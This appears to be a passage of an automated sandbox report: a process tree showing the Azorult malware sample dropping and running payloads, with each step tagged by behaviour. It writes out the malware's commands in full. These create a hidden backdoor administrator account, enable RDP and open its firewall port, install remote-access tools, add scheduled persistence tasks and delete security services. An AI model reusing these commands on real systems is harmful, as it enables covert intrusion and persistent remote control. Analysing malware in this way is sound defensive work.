      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:532
- - C:\Users\Admin\Downloads\Azorult.exe
    "C:\Users\Admin\Downloads\Azorult.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - UAC bypass
    - Blocks application from running via registry modification
    - Drops file in Drivers directory
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Modifies WinLogon
    - Hide Artifacts: Hidden Users
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - System policy modification
    PID:4200
  - - C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:3680
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        6⤵
        
        PID:2664
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        7⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:1852
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:4584
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4344
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1936
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:6036
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1964
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        7⤵
        Views/modifies file attributes
        
        PID:5916
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        7⤵
        Views/modifies file attributes
        
        PID:4148
        
        C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        7⤵
        Launches sc.exe
        
        PID:2104
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        7⤵
        Launches sc.exe
        
        PID:1736
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        7⤵
        Launches sc.exe
        
        PID:5756
    - - C:\ProgramData\Windows\winit.exe
        
        "C:\ProgramData\Windows\winit.exe"
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3356
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7016
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6176
  - - C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2188
    - - C:\ProgramData\Microsoft\Intel\taskhost.exe
        
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3700
      - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:412
      - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:5728
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:7048
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        8⤵
        Checks computer location settings
        Modifies registry class
        
        PID:6864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:6948
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2764
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5360
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        Delays execution with timeout.exe
        
        PID:6632
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5728
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        9⤵
        Executes dropped EXE
        
        PID:6792
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5224
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5876
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        9⤵
        Checks computer location settings
        
        PID:7016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        11⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        11⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        11⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7104
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        11⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        12⤵
        
        PID:6520
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5020
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        11⤵
        
        PID:6148
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        12⤵
        
        PID:6344
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        12⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        11⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        12⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:6796
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        12⤵
        
        PID:6664
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        12⤵
        
        PID:6736
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        12⤵
        
        PID:6320
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        11⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:1508
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        12⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:2440
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        12⤵
        
        PID:6188
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:6512
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        12⤵
        
        PID:4344
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        11⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:6492
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        11⤵
        Executes dropped EXE
        
        PID:3156
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        11⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:2220
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:7152
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        12⤵
        
        PID:6936
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        11⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:7120
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        11⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5360
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6896
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        9⤵
        Delays execution with timeout.exe
        
        PID:6536
      - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6604
        
        C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3356
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\48D7.tmp\48D8.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        8⤵
        
        PID:4000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:6576
      - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        6⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:6164
        
        C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3728
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        8⤵
        
        PID:2860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:1160
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        7⤵
        
        PID:6708
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        8⤵
        Gathers network information
        
        PID:6132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        7⤵
        
        PID:5240
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        8⤵
        
        PID:6492
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6604
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6452
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6420
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        6⤵
        Drops file in Drivers directory
        
        PID:6520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6960
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        6⤵
        
        PID:1508
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        7⤵
        Delays execution with timeout.exe
        
        PID:5212
        
        C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        7⤵
        Delays execution with timeout.exe
        
        PID:1628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:632
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7028
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        7⤵
        Views/modifies file attributes
        
        PID:1156
  - - C:\programdata\install\ink.exe
      C:\programdata\install\ink.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      4⤵
      PID:1428
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appidsvc
        5⤵
        Launches sc.exe
        
        PID:4148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      4⤵
      PID:1852
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appmgmt
        5⤵
        Launches sc.exe
        
        PID:2952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      4⤵
      PID:6032
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appidsvc start= auto
        5⤵
        Launches sc.exe
        
        PID:2072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      4⤵
      PID:1964
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appmgmt start= auto
        5⤵
        Launches sc.exe
        
        PID:420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:4400
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      System Location Discovery: System Language Discovery
      PID:3220
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop mbamservice
        5⤵
        Launches sc.exe
        
        PID:3476
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      System Location Discovery: System Language Discovery
      PID:1376
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:5456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:2984
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:3348
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete mbamservice
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:4288
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete crmsvc
        5⤵
        Launches sc.exe
        
        PID:5916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete "windows node"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5784
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete "windows node"
        5⤵
        Launches sc.exe
        
        PID:4000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
      4⤵
      Blocklisted process makes network request
      PID:1936
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop Adobeflashplayer
        5⤵
        Process spawned unexpected child process
        Launches sc.exe
        
        PID:3988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
      4⤵
      PID:3324
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AdobeFlashPlayer
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MoonTitle
      4⤵
      PID:4584
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MoonTitle
        5⤵
        Launches sc.exe
        
        PID:868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
      4⤵
      PID:3916
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MoonTitle"
        5⤵
        Launches sc.exe
        
        PID:832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop AudioServer
      4⤵
      PID:3964
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop AudioServer
        5⤵
        Launches sc.exe
        
        PID:2236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AudioServer"
      4⤵
      PID:2688
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AudioServer"
        5⤵
        Launches sc.exe
        
        PID:4952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
      4⤵
      PID:3196
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop clr_optimization_v4.0.30318_64
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
      4⤵
      PID:5784
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete clr_optimization_v4.0.30318_64"
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
      4⤵
      PID:1336
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MicrosoftMysql
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
      4⤵
      PID:1656
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MicrosoftMysql
        5⤵
        Launches sc.exe
        
        PID:4288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      4⤵
      PID:5456
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state on
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5652
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      PID:764
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      PID:2804
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3436
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      PID:2088
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4056
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      System Location Discovery: System Language Discovery
      PID:1108
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1376
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:2524
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:1244
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6204
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:1736
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:2068
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2804
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:6272
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      System Location Discovery: System Language Discovery
      PID:6556
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      PID:6728
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      System Location Discovery: System Language Discovery
      PID:6876
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7100
  - - C:\Windows\SysWOW64\cmd.exe
